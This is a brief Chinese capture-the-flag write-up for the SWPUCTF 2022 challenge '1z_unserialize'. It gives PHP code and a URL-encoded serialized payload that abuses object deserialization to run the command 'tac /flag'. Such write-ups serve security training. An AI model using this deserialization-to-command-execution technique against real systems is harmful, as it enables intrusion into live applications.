NSS [SWPUCTF 2022 新生赛]1z_unserialize

NSS [SWPUCTF 2022 新生赛]1z_unserialize

我敲，报恩题！

直接用构造方法构造POC更改$lt和$lly

class lyh{
    public $lt;
    public $lly;
    function  __construct()
    {
        $this->lt="system";
        $this->lly="tac /flag";
    }
}
$a = new lyh();
echo urlencode(serialize($a));
?>

payload：

nss=O%3A3%3A%22lyh%22%3A3%3A%7Bs%3A3%3A%22url%22%3Bs%3A10%3A%22NSSCTF.com%22%3Bs%3A2%3A%22lt%22%3Bs%3A6%3A%22system%22%3Bs%3A3%3A%22lly%22%3Bs%3A9%3A%22tac+%2Fflag%22%3B%7D